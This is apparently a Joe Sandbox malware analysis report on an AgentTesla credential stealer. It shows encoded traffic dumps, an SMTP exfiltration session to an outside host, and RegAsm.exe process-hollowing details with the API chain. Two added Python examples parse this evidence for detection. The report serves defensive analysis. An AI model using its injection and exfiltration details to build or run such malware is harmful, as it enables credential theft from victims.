2024-09-26 07:18:53 UTC | 1369 | IN | Data Raw: 43 45 57 38 70 4d 2b 6a 56 4b 43 47 72 4f 49 52 7a 44 76 2b 6a 6a 64 53 32 46 41 74 41 6d 51 38 68 7a 42 4f 55 58 65 78 30 48 31 68 34 30 46 64 4f 67 59 75 41 35 4f 61 71 47 6b 78 68 6c 51 48 6a 32 49 6a 74 6d 4c 50 41 55 58 58 51 45 39 78 48 61 2f 53 2b 58 6a 61 76 53 2f 4d 4b 62 49 70 59 53 79 69 4f 71 51 7a 6b 52 43 75 62 4b 4f 77 78 39 37 2f 4b 54 72 6a 61 30 72 66 53 4a 54 67 65 54 6e 64 62 79 30 64 67 54 4d 4e 4b 71 69 6b 45 7a 35 72 77 34 36 6c 64 2f 66 45 73 41 72 4f 6a 6d 53 45 44 46 61 72 32 69 6d 33 56 6b 44 41 61 57 30 41 68 45 38 77 72 37 53 47 4d 6f 44 50 6f 78 68 57 44 66 79 74 6f 57 42 41 37 5a 34 30 7a 4d 53 4b 41 34 4c 6a 54 4a 48 32 76 50 69 50 68 6a 48 67 33 37 5a 4a 52 4a 45 32 6a 31 56 30 6b 4d 52 55 34 2f 54 79 75 4d 31 4e 6c 45 72
Data Ascii: CEW8pM+jVKCGrOIRzDv+jjdS2FAtAmQ8hzBOUXex0H1h40FdOgYuA5OaqGkxhlQHj2IjtmLPAUXXQE9xHa/S+XjavS/MKbIpYSyiOqQzkRCubKOwx97/KTrja0rfSJTgeTndby0dgTMNKqikEz5rw46ld/fEsArOjmSEDFar2im3VkDAaW0AhE8wr7SGMoDPoxhWDfytoWBA7Z40zMSKA4LjTJH2vPiPhjHg37ZJRJE2j1V0kMRU4/TyuM1NlEr
2024-09-26 07:18:53 UTC | 1369 | IN | Data Raw: 34 4a 36 57 72 63 74 69 67 62 38 59 67 65 48 53 32 6b 72 69 75 71 6f 41 72 46 43 74 41 2f 5a 4b 4e 46 76 73 78 67 68 54 68 58 6a 45 32 47 57 78 6b 4b 45 49 33 63 72 52 38 44 6b 52 33 67 6f 78 46 4a 4f 42 71 6b 71 74 74 64 58 5a 62 2f 56 6d 64 70 6a 50 6d 56 6c 65 2b 72 4b 5a 45 61 35 47 4b 70 4d 49 36 4c 38 6e 46 77 34 75 4d 55 4b 6b 4e 70 6e 4e 66 6e 53 73 75 32 70 2f 69 67 39 57 64 32 32 39 69 6b 33 2b 63 46 77 36 45 4f 70 51 58 75 57 41 66 6e 48 4e 2f 4a 72 57 66 50 31 55 6f 53 74 75 44 59 53 54 4e 7a 2b 69 70 43 51 4d 4e 38 43 77 4e 59 57 6d 70 62 7a 4f 71 64 58 69 4a 38 74 2f 78 30 49 6b 42 78 5a 47 72 48 4c 37 51 65 33 33 4e 4b 58 78 65 79 55 31 44 34 62 50 32 47 46 59 31 6e 4e 6a 36 6a 6a 79 46 63 39 46 55 42 46 77 62 6e 2b 32 43 46 62 32 44 45 68
Data Ascii: 4J6Wrctigb8YgeHS2kriuqoArFCtA/ZKNFvsxghThXjE2GWxkKEI3crR8DkR3goxFJOBqkqttdXZb/VmdpjPmVle+rKZEa5GKpMI6L8nFw4uMUKkNpnNfnSsu2p/ig9Wd229ik3+cFw6EOpQXuWAfnHN/JrWfP1UoStuDYSTNz+ipCQMN8CwNYWmpbzOqdXiJ8t/x0IkBxZGrHL7Qe33NKXxeyU1D4bP2GFY1nNj6jjyFc9FUBFwbn+2CFb2DEh
2024-09-26 07:18:53 UTC | 1369 | IN | Data Raw: 79 2b 42 50 54 4f 38 4d 36 43 39 59 53 64 5a 47 45 78 6c 69 6b 57 53 41 54 46 67 32 71 70 35 64 6c 36 37 59 2f 5a 61 77 4f 32 73 7a 6a 32 54 4b 74 57 36 73 4d 49 53 36 78 51 59 39 44 57 62 4a 79 73 2b 71 37 57 70 4a 78 4f 50 70 31 50 43 42 59 6a 76 45 6e 50 73 77 5a 74 31 44 53 66 30 65 74 34 38 59 4c 4b 61 52 59 50 44 67 34 56 55 43 54 32 4f 77 38 6d 75 69 6e 7a 37 49 67 7a 4f 38 49 62 58 67 32 37 31 48 62 59 2f 71 72 57 65 70 6d 36 46 44 4e 77 4c 4c 54 41 30 4e 62 65 69 42 56 73 68 53 46 51 2b 67 6c 77 33 55 37 68 6d 4f 74 34 69 5a 2f 4a 5a 62 5a 6e 5a 6f 2b 4a 72 72 54 79 39 43 42 5a 37 6e 74 73 2b 57 74 6e 4a 71 72 61 6c 31 76 2b 77 53 31 50 5a 68 51 31 51 32 36 53 78 77 64 75 59 4f 6a 7a 4a 33 6c 4d 77 4f 73 78 68 6b 30 45 73 63 4a 49 79 4a 52 37 6a
                              Data Ascii: y+BPTO8M6C9YSdZGExlikWSATFg2qp5dl67Y/ZawO2szj2TKtW6sMIS6xQY9DWbJys+q7WpJxOPp1PCBYjvEnPswZt1DSf0et48YLKaRYPDg4VUCT2Ow8muinz7IgzO8IbXg271HbY/qrWepm6FDNwLLTA0NbeiBVshSFQ+glw3U7hmOt4iZ/JZbZnZo+JrrTy9CBZ7nts+WtnJqral1v+wS1PZhQ1Q26SxwduYOjzJ3lMwOsxhk0EscJIyJR7j
                              2024-09-26 07:18:53 UTC1369INData Raw: 51 6a 32 43 75 35 4e 53 73 53 56 44 4f 79 6f 42 78 6b 76 33 59 66 4d 34 67 44 68 79 4f 72 31 5a 75 53 61 71 54 33 38 77 58 70 35 48 39 71 54 33 54 78 6d 35 32 2f 70 47 7a 32 57 51 69 37 2b 68 50 77 4d 4d 42 4f 45 59 35 4c 41 4b 45 47 68 76 51 66 6d 6d 45 64 79 73 7a 2f 34 61 48 6b 69 48 7a 54 69 43 69 4b 55 53 45 2f 4b 7a 2b 71 70 32 4e 52 37 73 77 49 45 4f 52 49 4c 43 49 4e 43 39 79 49 70 36 47 5a 6a 7a 42 42 73 46 6b 77 78 4c 56 72 36 6b 48 64 70 34 70 57 63 4e 39 37 77 75 48 4d 4a 39 6b 68 6f 43 59 6d 54 51 67 2b 50 4a 55 71 44 35 36 47 36 57 4f 32 69 42 49 41 65 52 58 65 6f 63 50 66 43 4a 6d 38 76 4d 65 65 48 69 56 66 75 38 48 39 75 42 33 4d 6e 57 7a 7a 55 55 73 65 67 45 63 77 69 4f 4b 71 55 45 62 42 73 58 78 57 75 53 7a 4e 77 49 61 77 4c 43 32 57 44
                              Data Ascii: Qj2Cu5NSsSVDOyoBxkv3YfM4gDhyOr1ZuSaqT38wXp5H9qT3Txm52/pGz2WQi7+hPwMMBOEY5LAKEGhvQfmmEdysz/4aHkiHzTiCiKUSE/Kz+qp2NR7swIEORILCINC9yIp6GZjzBBsFkwxLVr6kHdp4pWcN97wuHMJ9khoCYmTQg+PJUqD56G6WO2iBIAeRXeocPfCJm8vMeeHiVfu8H9uB3MnWzzUUsegEcwiOKqUEbBsXxWuSzNwIawLC2WD
                              2024-09-26 07:18:53 UTC1369INData Raw: 6f 42 52 59 2b 6e 4a 70 49 72 51 7a 4f 37 49 41 39 5a 34 79 49 5a 70 47 4e 6f 49 4e 50 36 65 6d 4a 4b 4c 67 74 42 50 59 34 4d 53 46 4b 30 45 69 39 32 5a 59 48 67 4b 76 66 2b 65 77 2f 6d 77 41 55 51 2b 31 79 58 49 53 57 6f 5a 67 6c 43 63 6b 6f 72 74 78 54 73 62 70 42 6c 33 64 4f 68 69 70 68 62 79 33 47 46 6d 79 4a 67 79 4a 54 6f 6f 6b 66 2b 63 6f 46 41 49 57 62 4e 48 5a 55 66 71 4c 31 46 6e 74 6b 76 37 52 4c 78 6b 55 49 50 6d 54 49 57 6c 2f 78 57 30 33 6f 37 62 6f 6e 53 50 71 59 54 36 30 31 5a 2f 54 75 6a 72 4c 33 35 66 73 57 47 38 35 4e 58 72 59 31 59 48 41 33 68 57 65 64 4a 59 43 55 7a 63 67 56 76 67 76 2b 50 59 4b 4d 7a 59 62 41 6f 54 4c 6b 46 6e 32 34 62 59 75 50 46 79 4a 54 6f 77 51 63 51 59 36 45 58 38 35 64 51 75 54 54 33 57 77 72 6f 42 32 74 7a 63
                              Data Ascii: oBRY+nJpIrQzO7IA9Z4yIZpGNoINP6emJKLgtBPY4MSFK0Ei92ZYHgKvf+ew/mwAUQ+1yXISWoZglCckortxTsbpBl3dOhiphby3GFmyJgyJTookf+coFAIWbNHZUfqL1Fntkv7RLxkUIPmTIWl/xW03o7bonSPqYT601Z/TujrL35fsWG85NXrY1YHA3hWedJYCUzcgVvgv+PYKMzYbAoTLkFn24bYuPFyJTowQcQY6EX85dQuTT3WwroB2tzc


                              Timestamp                             Src port  Dst port  Source IP      Dest IP        Commands
                              Sep 26, 2024 09:18:57.440876961 CEST  587       49733     78.110.166.82  192.168.2.4    220-cphost14.qhoster.net ESMTP Exim 4.96.2 #2 Thu, 26 Sep 2024 08:18:57 +0100
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                              Sep 26, 2024 09:18:57.441437960 CEST  49733     587       192.168.2.4    78.110.166.82  EHLO 562258
                              Sep 26, 2024 09:18:57.607733011 CEST  587       49733     78.110.166.82  192.168.2.4    250-cphost14.qhoster.net Hello 562258 [8.46.123.33]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                              Sep 26, 2024 09:18:57.608017921 CEST  49733     587       192.168.2.4    78.110.166.82  STARTTLS
                              Sep 26, 2024 09:18:58.035113096 CEST  587       49733     78.110.166.82  192.168.2.4    220 TLS go ahead
                              Sep 26, 2024 09:18:58.036175013 CEST  587       49733     78.110.166.82  192.168.2.4    220 TLS go ahead
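The plaintext phase of the SMTP session above is everything a network sensor gets: after the client's STARTTLS and the server's "220 TLS go ahead", the message AgentTesla submits is inside TLS, so the EHLO name, the server banner, the public IP the server echoes back and the STARTTLS negotiation are the only network evidence left. The Python below is an added example, not code from Joe Security or from the sample. It parses the session (re-typed in a whitespace-separated form, with the multi-line banner attributed to the same packet as its first line) into a summary of what is still readable, then flags a submission-port connection from an image that is not a mail client, which is the check that singles out RegAsm.exe, the injected process listed further down. The allowlist of mail-client image names is an assumption for a workstation build.

```python
"""Summarise the plaintext phase of a captured SMTP session and flag mail
submission from a process that should never speak SMTP.
Added example; not code from Joe Security or from the analysed sample."""
import re

SUBMISSION_PORTS = {25, 465, 587}
# Assumed allowlist for a workstation image: only real mail clients may open a
# submission connection; RegAsm.exe and other .NET utilities never should.
ALLOWED_SMTP_CLIENTS = {"outlook.exe", "thunderbird.exe"}

# Constructed from the report's network table, one packet line per row:
# "time sport dport sip dip text".  The banner continuation lines carry the
# timestamp of the packet they arrived in.
SESSION = """\
09:18:57.440876961 587 49733 78.110.166.82 192.168.2.4 220-cphost14.qhoster.net ESMTP Exim 4.96.2 #2 Thu, 26 Sep 2024 08:18:57 +0100
09:18:57.440876961 587 49733 78.110.166.82 192.168.2.4 220-We do not authorize the use of this system to transport unsolicited,
09:18:57.440876961 587 49733 78.110.166.82 192.168.2.4 220 and/or bulk e-mail.
09:18:57.441437960 49733 587 192.168.2.4 78.110.166.82 EHLO 562258
09:18:57.607733011 587 49733 78.110.166.82 192.168.2.4 250-cphost14.qhoster.net Hello 562258 [8.46.123.33]
09:18:57.607733011 587 49733 78.110.166.82 192.168.2.4 250-SIZE 52428800
09:18:57.607733011 587 49733 78.110.166.82 192.168.2.4 250-8BITMIME
09:18:57.607733011 587 49733 78.110.166.82 192.168.2.4 250-PIPELINING
09:18:57.607733011 587 49733 78.110.166.82 192.168.2.4 250-PIPECONNECT
09:18:57.607733011 587 49733 78.110.166.82 192.168.2.4 250-STARTTLS
09:18:57.607733011 587 49733 78.110.166.82 192.168.2.4 250 HELP
09:18:57.608017921 49733 587 192.168.2.4 78.110.166.82 STARTTLS
09:18:58.035113096 587 49733 78.110.166.82 192.168.2.4 220 TLS go ahead
"""

_HELLO = re.compile(r"Hello\s+(\S+)\s+\[([0-9.]+)\]")


def parse_transcript(text):
    """Return one dict per line; 'dir' is 'C' (client->server) or 'S'."""
    out = []
    for raw in text.splitlines():
        if not raw.strip():
            continue
        ts, sport, dport, sip, dip, msg = raw.split(None, 5)
        sport, dport = int(sport), int(dport)
        # The side whose port is a well-known submission port is the server.
        direction = "C" if dport in SUBMISSION_PORTS else "S"
        out.append({"ts": ts, "dir": direction, "sport": sport, "dport": dport,
                    "sip": sip, "dip": dip, "msg": msg})
    return out


def summarize_session(records):
    """Extract what a responder can still read from the plaintext phase."""
    first = records[0]
    server = (first["sip"], first["sport"]) if first["dir"] == "S" \
        else (first["dip"], first["dport"])
    s = {"server": f"{server[0]}:{server[1]}", "banner": None, "ehlo": None,
         "public_ip_seen_by_server": None, "extensions": [],
         "starttls_offered": False, "starttls_requested": False,
         "tls_started": False, "plaintext_commands": []}
    awaiting_tls = False
    for r in records:
        msg = r["msg"]
        if r["dir"] == "C":
            verb = msg.split()[0].upper()
            s["plaintext_commands"].append(verb)
            if verb in ("EHLO", "HELO"):
                s["ehlo"] = msg.split(None, 1)[1] if " " in msg else ""
            elif verb == "STARTTLS":
                s["starttls_requested"] = True
                awaiting_tls = True
            continue
        code, rest = msg[:3], msg[4:]          # "220-text" / "220 text"
        if code == "220" and s["banner"] is None:
            s["banner"] = rest
        elif code == "220" and awaiting_tls:
            s["tls_started"] = True            # everything after this is opaque
        elif code == "250":
            m = _HELLO.search(rest)
            if m:                              # greeting echoes our public IP
                s["public_ip_seen_by_server"] = m.group(2)
            else:
                s["extensions"].append(rest)
                if rest.upper() == "STARTTLS":
                    s["starttls_offered"] = True
    return s


def unexpected_smtp_client(summary, image_path, allowed=ALLOWED_SMTP_CLIENTS):
    """True when a process outside the allowlist opened a submission session.
    The verdict deliberately ignores tls_started: once STARTTLS succeeds the
    exfiltrated body is invisible on the wire, so process identity plus the
    EHLO/STARTTLS phase is all the evidence a detection can use."""
    port = int(summary["server"].rsplit(":", 1)[1])
    image = image_path.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return port in SUBMISSION_PORTS and image not in allowed


if __name__ == "__main__":
    summary = summarize_session(parse_transcript(SESSION))
    print(summary)
    print(unexpected_smtp_client(
        summary, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"))
```

The direction heuristic (server = whichever side uses 25/465/587) is enough for a sandbox capture; on a real sensor use the flow's initiator instead, since a compromised host may also run a listener on those ports.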


                              Target ID:0
                              Start time:03:18:52
                              Start date:26/09/2024
                              Path:C:\Users\user\Desktop\450230549.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\450230549.exe"
                              Imagebase:0x3d0000
                              File size:107'848 bytes
                              MD5 hash:5086980F3EE0C035EC304102E6981410
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1726211238.0000000003709000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1726211238.0000000003709000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              Target ID:1
                              Start time:03:18:54
                              Start date:26/09/2024
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              Imagebase:0x200000
                              File size:65'440 bytes
                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:2
                              Start time:03:18:54
                              Start date:26/09/2024
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              Imagebase:0xe0000
                              File size:65'440 bytes
                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:3
                              Start time:03:18:54
                              Start date:26/09/2024
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              Imagebase:0x530000
                              File size:65'440 bytes
                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3558791115.0000000002925000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3558791115.0000000002902000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3558791115.00000000028D5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3558791115.00000000028D5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3557540735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3557540735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high
                              Has exited:false


                                Execution Graph

                                Execution Coverage:31.8%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:19.6%
                                Total number of Nodes:102
                                Total number of Limit Nodes:4
                                execution_graph 2618 d33c51 2619 d33ca3 ReadProcessMemory 2618->2619 2620 d33ce6 2619->2620 2634 d322e1 2635 d32243 2634->2635 2636 d322e4 2634->2636 2635->2634 2635->2636 2637 d33f01 ResumeThread 2635->2637 2638 d33f2e 2637->2638 2631 d33d20 2632 d33d6b VirtualAllocEx 2631->2632 2633 d33da2 2632->2633 2639 d33eb9 2640 d33f01 ResumeThread 2639->2640 2641 d33f2e 2640->2641 2655 d33b89 2656 d33bd8 Wow64SetThreadContext 2655->2656 2658 d33c16 2656->2658 2541 d30a28 2542 d30a42 2541->2542 2545 d30fa0 2542->2545 2546 d30fd7 2545->2546 2552 d32b17 2546->2552 2562 d32b28 2546->2562 2572 d32b19 2546->2572 2582 d335a6 2546->2582 2547 d30ab2 2561 d32b91 2552->2561 2553 d335fa 2553->2547 2558 d32234 WriteProcessMemory 2558->2561 2561->2553 2561->2558 2592 d321ec 2561->2592 2598 d321f8 2561->2598 2602 d32210 2561->2602 2606 d32228 2561->2606 2610 d32240 2561->2610 2614 d32258 2561->2614 2571 d32b5b 2562->2571 2563 d335fa 2563->2547 2564 d321ec 2 API calls 2564->2571 2565 d321f8 Wow64SetThreadContext 2565->2571 2566 d32210 ReadProcessMemory 2566->2571 2567 d32228 VirtualAllocEx 2567->2571 2568 d32234 WriteProcessMemory 2568->2571 2569 d32240 Wow64SetThreadContext 2569->2571 2570 d32258 ResumeThread 2570->2571 2571->2563 2571->2564 2571->2565 2571->2566 2571->2567 2571->2568 2571->2569 2571->2570 2579 d32b5b 2572->2579 2573 d335fa 2573->2547 2574 d321ec 2 API calls 2574->2579 2575 d321f8 Wow64SetThreadContext 2575->2579 2576 d32210 ReadProcessMemory 2576->2579 2577 d32228 VirtualAllocEx 2577->2579 2578 d32234 WriteProcessMemory 2578->2579 2579->2573 2579->2574 2579->2575 2579->2576 2579->2577 2579->2578 2580 d32240 Wow64SetThreadContext 2579->2580 2581 d32258 ResumeThread 2579->2581 2580->2579 2581->2579 2591 d32c06 2582->2591 2583 d335fa 2583->2547 2584 d321ec 2 API calls 2584->2591 2585 d321f8 Wow64SetThreadContext 2585->2591 2586 d32210 ReadProcessMemory 2586->2591 2587 d32228 VirtualAllocEx 2587->2591 2588 d32234 WriteProcessMemory 2588->2591 
2589 d32240 Wow64SetThreadContext 2589->2591 2590 d32258 ResumeThread 2590->2591 2591->2583 2591->2584 2591->2585 2591->2586 2591->2587 2591->2588 2591->2589 2591->2590 2593 d33798 CreateProcessA 2592->2593 2595 d339e2 2593->2595 2596 d33e41 WriteProcessMemory 2595->2596 2597 d33e7c 2596->2597 2597->2561 2599 d33b90 Wow64SetThreadContext 2598->2599 2601 d33c16 2599->2601 2601->2561 2603 d33c58 ReadProcessMemory 2602->2603 2605 d33ce6 2603->2605 2605->2561 2607 d33d28 VirtualAllocEx 2606->2607 2609 d33da2 2607->2609 2609->2561 2611 d33b90 Wow64SetThreadContext 2610->2611 2613 d33c16 2611->2613 2613->2561 2615 d3225f ResumeThread 2614->2615 2617 d33f2e 2615->2617 2617->2561 2621 d33dd8 2622 d33e2b WriteProcessMemory 2621->2622 2624 d33e7c 2622->2624 2642 d33a58 2643 d33a60 2642->2643 2644 d33e41 WriteProcessMemory 2643->2644 2645 d33e7c 2644->2645 2646 d32278 2647 d32243 2646->2647 2647->2646 2648 d33f01 ResumeThread 2647->2648 2650 d322e4 2647->2650 2649 d33f2e 2648->2649 2651 d30a18 2652 d30a42 2651->2652 2654 d30fa0 8 API calls 2652->2654 2653 d30ab2 2654->2653 2625 d321cf 2628 d321d6 CreateProcessA 2625->2628 2630 d32234 2625->2630 2626 d33e41 WriteProcessMemory 2627 d33e7c 2626->2627 2628->2630 2630->2626 2659 d3378d 2660 d33824 CreateProcessA 2659->2660 2662 d339e2 2660->2662 2663 d33e41 WriteProcessMemory 2662->2663 2664 d33e7c 2663->2664
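The execution graph above is a flat node/edge dump, but it already names the APIs that make up a process-hollowing chain: CreateProcessA, VirtualAllocEx, ReadProcessMemory, WriteProcessMemory, Wow64SetThreadContext and ResumeThread, all called from the d32b91/d32b5b functions. The Python below is an added example, not Joe Security's code. It parses a subset of that dump (copied from the graph above; the d32b19 and d335a6 call-site variants are omitted) into nodes and edges, collects which of those APIs are reachable from the injector's entry node, and reports whether the full hollowing set is present. Two assumptions are labelled in the code: an address token has at least five hex digits and one letter (true for this report's d3xxxx functions), and the verdict is ordering-agnostic, because the graph's return edges make the injector a single cycle, so reachability rather than call order is what the dump supports.

```python
"""Parse a Joe Sandbox execution_graph text dump and check whether the API set
reachable from an entry node matches a process-hollowing chain
(CreateProcessA -> VirtualAllocEx/ReadProcessMemory/WriteProcessMemory ->
*SetThreadContext -> ResumeThread).  Added example, not Joe Security code."""
import re
from collections import defaultdict, deque

# Token shapes in the dump: "<id> <addr> [label words...]" defines a node and
# "<a>-><b>" is an edge.  Assumption: an address is >= 5 hex digits containing
# at least one letter (true for the d3xxxx functions in this report); that is
# what keeps a decimal node id from being mistaken for an address.
_EDGE = re.compile(r"^(\d+)->(\d+)$")
_ADDR = re.compile(r"^[0-9a-f]{5,16}$")
# A Win32 export name: capitalised, mixed case.  This rejects the "2 API calls"
# summary label Joe puts on collapsed nodes ("API" has no lowercase letter).
_API = re.compile(r"^[A-Z][A-Za-z0-9]*[a-z][A-Za-z0-9]*$")

HOLLOWING_REQUIRED = {"CreateProcessA", "WriteProcessMemory", "ResumeThread"}
HOLLOWING_CONTEXT = {"SetThreadContext", "Wow64SetThreadContext"}

# Constructed input: node/edge text copied from the report's execution graph
# for the injector (entry 2541 d30a28) and two of its call-site variants.
GRAPH = """2541 d30a28 2542 d30a42 2541->2542 2545 d30fa0 2542->2545 2546 d30fd7
2545->2546 2552 d32b17 2546->2552 2562 d32b28 2546->2562 2547 d30ab2 2561 d32b91
2552->2561 2553 d335fa 2553->2547 2558 d32234 WriteProcessMemory 2558->2561
2561->2553 2561->2558 2592 d321ec 2561->2592 2598 d321f8 2561->2598 2602 d32210
2561->2602 2606 d32228 2561->2606 2610 d32240 2561->2610 2614 d32258 2561->2614
2571 d32b5b 2562->2571 2563 d335fa 2563->2547 2564 d321ec 2 API calls 2564->2571
2565 d321f8 Wow64SetThreadContext 2565->2571 2566 d32210 ReadProcessMemory 2566->2571
2567 d32228 VirtualAllocEx 2567->2571 2568 d32234 WriteProcessMemory 2568->2571
2569 d32240 Wow64SetThreadContext 2569->2571 2570 d32258 ResumeThread 2570->2571
2571->2563 2571->2564 2571->2565 2571->2566 2571->2567 2571->2568 2571->2569 2571->2570
2593 d33798 CreateProcessA 2592->2593 2595 d339e2 2593->2595 2596 d33e41 WriteProcessMemory
2595->2596 2597 d33e7c 2596->2597 2597->2561 2599 d33b90 Wow64SetThreadContext 2598->2599
2601 d33c16 2599->2601 2601->2561 2603 d33c58 ReadProcessMemory 2602->2603 2605 d33ce6
2603->2605 2605->2561 2607 d33d28 VirtualAllocEx 2606->2607 2609 d33da2 2607->2609
2609->2561 2611 d33b90 Wow64SetThreadContext 2610->2611 2613 d33c16 2611->2613 2613->2561
2615 d3225f ResumeThread 2614->2615 2617 d33f2e 2615->2617 2617->2561"""


def parse_execution_graph(text):
    """Return (nodes, edges): nodes maps id -> (addr, [api names]);
    edges is a list of (src, dst) node-id pairs."""
    toks = text.split()
    nodes, edges, cur = {}, [], None
    i = 0
    while i < len(toks):
        t = toks[i]
        m = _EDGE.match(t)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
        elif (t.isdigit() and i + 1 < len(toks) and _ADDR.match(toks[i + 1])
              and not toks[i + 1].isdigit()):
            cur = int(t)
            nodes[cur] = (toks[i + 1], [])
            i += 1                              # consume the address token
        elif cur is not None and _API.match(t):
            nodes[cur][1].append(t)             # label word naming an API
        i += 1
    return nodes, edges


def reachable_apis(nodes, edges, start):
    """BFS from `start`; return {api name: sorted function addresses}."""
    succ = defaultdict(list)
    for a, b in edges:
        succ[a].append(b)
    seen, queue, found = {start}, deque([start]), defaultdict(set)
    while queue:
        n = queue.popleft()
        addr, apis = nodes.get(n, ("?", []))
        for api in apis:
            found[api].add(addr)
        for b in succ[n]:
            if b not in seen:
                seen.add(b)
                queue.append(b)
    return {api: sorted(addrs) for api, addrs in found.items()}


def hollowing_verdict(api_map):
    """(True, []) when every required API plus one SetThreadContext variant is
    reachable; otherwise (False, sorted names of what is missing)."""
    present = set(api_map)
    missing = set(HOLLOWING_REQUIRED - present)
    if not present & HOLLOWING_CONTEXT:
        missing.add("SetThreadContext|Wow64SetThreadContext")
    return not missing, sorted(missing)


if __name__ == "__main__":
    nodes, edges = parse_execution_graph(GRAPH)
    api_map = reachable_apis(nodes, edges, 2541)
    for api, addrs in sorted(api_map.items()):
        print(f"{api:24s} {' '.join(addrs)}")
    print(hollowing_verdict(api_map))
```

Because Joe collapses some callees to "N API calls" (node 2564 here), resolve such nodes through another node with the same address (2592, d321ec, which leads to CreateProcessA) before concluding an API is absent; the BFS above does this implicitly because the return edges bring it back through d32b91.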

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 102 d32b28-d32b59 103 d32b60-d32bd9 102->103 104 d32b5b 102->104 106 d32bf4-d32bf8 103->106 104->103 107 d32bdb-d32bed 106->107 108 d32bfa-d32c01 106->108 107->106 109 d32bef 107->109 110 d335dd-d335f4 108->110 109->106 111 d32c06-d32d67 call d321ec 110->111 112 d335fa-d33601 110->112 124 d32dab-d32e17 111->124 125 d32d69-d32da0 111->125 132 d32e19 124->132 133 d32e1e-d32e44 124->133 125->124 132->133 135 d32e4a-d32e5a call d321f8 133->135 136 d32ef9-d32f03 133->136 140 d32e5f-d32e6c 135->140 138 d32f05 136->138 139 d32f0a-d32f5c call d32210 136->139 138->139 147 d32fa0-d32fb9 139->147 148 d32f5e-d32f95 139->148 142 d32e9e-d32ea0 140->142 143 d32e6e-d32e9c call d32204 140->143 146 d32ea6-d32eb4 142->146 143->146 150 d32eb6-d32eed 146->150 151 d32ef8 146->151 152 d33032-d330c1 call d32228 147->152 153 d32fbb-d32fed call d3221c 147->153 148->147 150->151 151->136 169 d330c3-d330fa 152->169 170 d33105-d3314f call d32234 152->170 159 d33031 153->159 160 d32fef-d33026 153->160 159->152 160->159 169->170 176 d33193-d331c8 170->176 177 d33151-d33188 170->177 182 d33346-d33362 176->182 177->176 184 d33368-d333ce call d32234 182->184 185 d331cd-d33254 182->185 192 d33412-d33443 184->192 193 d333d0-d33407 184->193 197 d3333b-d33340 185->197 198 d3325a-d332d1 call d32234 185->198 199 d33445 192->199 200 d3344a-d33475 192->200 193->192 197->182 211 d332d6-d332f6 198->211 199->200 205 d33530-d33539 call d32258 200->205 206 d3347b-d3348b call d32240 200->206 213 d3353e-d3355e 205->213 212 d33490-d3349d 206->212 214 d3333a 211->214 215 d332f8-d3332f 211->215 216 d334cf-d334d1 212->216 217 d3349f-d334cd call d3224c 212->217 218 d335a2-d335d8 213->218 219 d33560-d33597 213->219 214->197 215->214 222 d334d7-d334eb 216->222 217->222 218->110 218->112 219->218 226 d3352f 222->226 227 d334ed-d33524 222->227 226->205 227->226
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID: (
                                • API String ID: 3559483778-3887548279
                                • Opcode ID: 6a63a667dfaf60efe127d508f1231213a1baff22a9537cf4895109cc2fb8f785
